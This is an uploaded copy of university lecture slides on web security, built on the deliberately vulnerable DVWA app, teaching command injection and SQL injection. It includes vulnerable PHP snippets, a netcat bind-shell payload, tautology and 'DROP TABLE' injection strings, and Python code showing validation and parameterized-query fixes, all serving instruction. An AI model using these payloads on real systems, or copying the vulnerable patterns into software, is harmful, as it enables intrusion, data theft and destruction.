Web Security

Uploaded by

mc noob

Web Security

Jonathan Burket
Carnegie Mellon University

Credits: Original Slides by David Brumley.


Examples based on DVWA (http://www.dvwa.co.uk/)
Collin Jackson’s Web Security Course
http://caffeinept.blogspot.com/2012/01/dvwa-sql-injection.html
Graphics from The Noun Project
We're done with Crypto!

Key concepts like authentication, integrity, man-in-the-middle attacks, etc. will still be important.
Web Application Overview

The client requests a URL such as subdomain.mysite.com/folder/page?id=5; the server runs any database queries it needs and answers with an HTML page, JS file, CSS file, image, etc.

• GET requests: used for requests for pages, resources, etc.
• POST requests: used for form submissions, logins, etc.
Web Security Overview (By Threat Model)

Malicious Client Attacking Server
• SQL Injection
• File System Traversal
• Broken Access Control

Malicious Server Attacking Client
• Clickjacking
• History Probing
• Phishing

Malicious User Attacking Other Users
• Cross-Site Scripting
• Cross-Site Request Forgery
• Remote Script Inclusion

Malicious Server in "Mashup" Web Application
• Clickjacking
• Information Stealing

Malicious User in Multi-Server Application
• Single sign-on (Facebook, Twitter, etc.): Sign in as someone else
• Multi-Party Payment (Paypal, Amazon Payments): Buy things for free
Injection Flaws

"Injection flaws occur when an application sends untrusted data to an interpreter."
--- OWASP

Like buffer overflow and format string vulnerabilities, injection flaws are a result of mixing data and code.

Reference: https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References
1. Client requests http://site.com/exec/
2. Server sends the page; the form below is the input to the program:

<h2>Ping for FREE</h2>
<p>Enter an IP address below:</p>
<form name="ping" action="#" method="post">
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</form>
3. Client submits the form (the ip input):

POST /dvwa/vulnerabilities/exec/ HTTP/1.1
Host: 172.16.59.128
...
ip=127.0.0.1&submit=submit

4. Server runs the PHP exec program on the ip input and sends the output back:

$t = $_REQUEST['ip'];
$o = shell_exec('ping -c 3 ' . $t);   // the raw request value is appended to the shell command
echo $o;

Spot the bug: the ip value is concatenated into the command line unchecked, so any shell metacharacters it contains are interpreted by the shell.

The same request with "; ls" appended to the ip field (URL-encoded as %3b+ls):

POST /dvwa/vulnerabilities/exec/ HTTP/1.1
Host: 172.16.59.128
...
ip=127.0.0.1%3b+ls&submit=submit

The server runs ping and then ls, and echoes both outputs: information disclosure.
Getting a Shell

ip=127.0.0.1+%26+netcat+-v+-e+'/bin/bash'+-l+-p+31337&submit=submit

which the server decodes and runs as:

netcat -v -e '/bin/bash' -l -p 31337
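The same handler re-created in Python, as an added example that is not DVWA's code: it decodes the POST body the way the server sees it, then accepts only a literal IP address and builds an argv list instead of a shell string, so the "; ls" body above is rejected before anything runs. The function names are my own.

```python
import ipaddress
import subprocess
from urllib.parse import parse_qs


def target_from_post_body(body: str) -> str:
    """Decode the ip field exactly as the server would see it.

    parse_qs turns '%3b' into ';' and '+' into a space, which is why the
    encoded request on the slide reaches shell_exec() as '127.0.0.1; ls'.
    """
    return parse_qs(body).get("ip", [""])[0]


def build_ping_command(user_input: str) -> list:
    """Return the ping argv for a value that is a literal IP address.

    ipaddress.ip_address() rejects anything that is not a bare IPv4/IPv6
    address, so shell metacharacters (';', '&', '|', quotes) never get
    through: it raises ValueError, which the caller turns into an error page.
    """
    addr = ipaddress.ip_address(user_input.strip())
    return ["ping", "-c", "3", str(addr)]


def is_safe_ping_target(user_input: str) -> bool:
    try:
        build_ping_command(user_input)
        return True
    except ValueError:
        return False


def run_ping(user_input: str) -> str:
    # An argv list with shell=False (the default) is handed straight to
    # execve(): the target is one argument, never text for /bin/sh to parse.
    argv = build_ping_command(user_input)
    return subprocess.run(argv, capture_output=True, text=True,
                          timeout=20).stdout


# Constructed POST bodies modelled on the slides: a normal submission and
# the one carrying the '; ls' payload.
SAMPLE_BODIES = [
    "ip=127.0.0.1&submit=submit",
    "ip=127.0.0.1%3b+ls&submit=submit",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        value = target_from_post_body(body)
        print(f"{value!r:24} accepted={is_safe_ping_target(value)}")
```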
SQL Injection

1. Browser requests /user.php?id=5
2. Server queries the database: SELECT * FROM users WHERE uid=5
3. Database returns "jburket"
4. Page shows "jburket"

SQL Injection

1. Browser requests /user.php?id=-1 or admin=true
2. Server queries the database: SELECT * FROM users WHERE uid=-1 or admin=true
3. Database returns "adminuser"
4. Page shows "adminuser"
CardSystems Attack
• CardSystems
– credit card payment processing company
– SQL injection attack in June 2005
– put out of business

• The Attack
– 263,000 credit card #s stolen from database
– credit card #s stored unencrypted
– 43 million credit card #s exposed

Images: http://usa.visa.com/merchants/marketing_center/logo_usage.html
https://www.mastercardbrandcenter.com/
SQL Primer

A table is defined by a tuple (t1, t2, ..., tn) of typed named values. Each row is a tuple of values (v1:t1, v2:t2, ... vn:tn).

Column 1 of Type 1 | Column 2 of Type 2 | Column 3 of Type 3
value 1            | value 2            | value 3
value 4            | value 5            | value 6

'users' table (column types annotated on the slide: smallint for user_id, varchar(15) for the text columns):

user_id | first_name | last_name | user    | password | avatar
1       | admin      | admin     | admin   | <hash 1> | admin.jpg
2       | Gordon     | Brown     | gordonb | <hash 2> | gordonb.jpg
3       | Hack       | Me        | 1337    | <hash 3> | hacker.jpg
...     | ...        | ...       | ...     | ...      | ...
users table:
user_id | first_name | last_name | user    | password | avatar
1       | admin      | admin     | admin   | <hash 1> | admin.jpg
2       | Gordon     | Brown     | gordonb | <hash 2> | gordonb.jpg
3       | Hack       | Me        | 1337    | <hash 3> | hacker.jpg
...     | ...        | ...       | ...     | ...      | ...

comments table:
user_id | comment_id | comment
1       | 1          | Test Comment
2       | 2          | I like sugar
2       | 3          | But not milk
3       | 4          | Gordon is silly

A schema is a collection of tables with their intended relations.
Basic Queries

SELECT <columns> from <db> where <exp>

Returns the given columns of every row in db for which exp is true.
• columns can either be:
  – List of comma-separated column names
  – "*" for all columns
• db is a comma-separated list of tables
• exp is a Boolean SQL expression
  – Single quotes for strings ('')
  – Integers are specified in the normal way
• Comments are specified:
  – Single line: '--' (two dashes)
  – Multi-line: "/*" and "*/" (like C)
  – Server-specific, e.g., "#" single-line comment for MySQL
Example Query

SELECT <columns> from <db> where <exp>

select * from comments where user_id = 2;

comments table:
user_id | comment_id | comment
1       | 1          | Test Comment
2       | 2          | I like sugar
2       | 3          | But not milk
3       | 4          | Gordon is silly

Result:
2, 2, "I like sugar"
2, 3, "But not milk"
Join Example

SELECT <columns> from <db> where <exp>

select users.first_name, comments.comment
from users, comments
where users.user_id=comments.user_id
and users.user_id = 2;

users table:
user_id | first_name | last_name | user    | ...
1       | admin      | admin     | admin   | ...
2       | Gordon     | Brown     | gordonb | ...

comments table:
user_id | comment_id | comment
1       | 1          | Test Comment
2       | 2          | I like sugar
2       | 3          | But not milk
3       | 4          | Gordon is silly

Result (join of the two tables):
Gordon, "I like sugar"
Gordon, "But not milk"
Tautologies

SELECT <columns> from <db> where <exp>

select * from comments where user_id = 2 OR 1=1;

Result (comments table as above; 1=1 is true for every row):
1, 1, "Test Comment"
2, 2, "I like sugar"
2, 3, "But not milk"
3, 4, "Gordon is silly"

Tautologies are often used in real attacks.
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');

Guess as to the exploit?
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');

Solution: 1 or 1=1;
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');

Does quoting make it safe?

Hint: Comments are specified:
• Single line: '--' (two dashes)
• Multi-line: "/*" and "*/"
• "#" single-line comment for MySQL
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');

1' OR 1=1;#
Even worse

$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');

1' ; DROP TABLE Users ; -- #

Command not verified, but you get the idea
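An added Python/SQLite re-creation of the $_GET['id'] queries above (not the DVWA PHP): the unquoted and quoted string-built lookups beside a parameterized one, run against a constructed copy of the users table. SQLite has no "#" comment, so the ";#" payload is written with "--" (also listed in the primer); the function names are my own.

```python
import sqlite3

# Constructed in-memory copy of the slides' users table; the password
# column holds placeholders, not real hashes.
USERS = [
    (1, "admin", "admin", "admin", "<hash 1>", "admin.jpg"),
    (2, "Gordon", "Brown", "gordonb", "<hash 2>", "gordonb.jpg"),
    (3, "Hack", "Me", "1337", "<hash 3>", "hacker.jpg"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT, avatar TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?, ?)", USERS)
    return conn


def lookup_unquoted(conn, user_id: str) -> list:
    # The request value is spliced bare into the SQL text, so the database
    # parses attacker-controlled SQL rather than comparing a value.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {user_id}"
    return conn.execute(query).fetchall()


def lookup_quoted(conn, user_id: str) -> list:
    # Wrapping the value in quotes only moves the problem: a quote in the
    # input closes the literal and a comment token discards the rest.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id: str) -> list:
    # Bound parameter: the value never becomes part of the SQL grammar, so a
    # tautology string is compared as a literal and matches no user_id.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal   :", lookup_quoted(db, "2"))                 # Gordon only
    print("tautology:", lookup_unquoted(db, "1 OR 1=1"))        # every row
    print("quoted   :", lookup_quoted(db, "1' OR 1=1 --"))      # every row
    print("bound    :", lookup_parameterized(db, "1' OR 1=1 --"))  # []
```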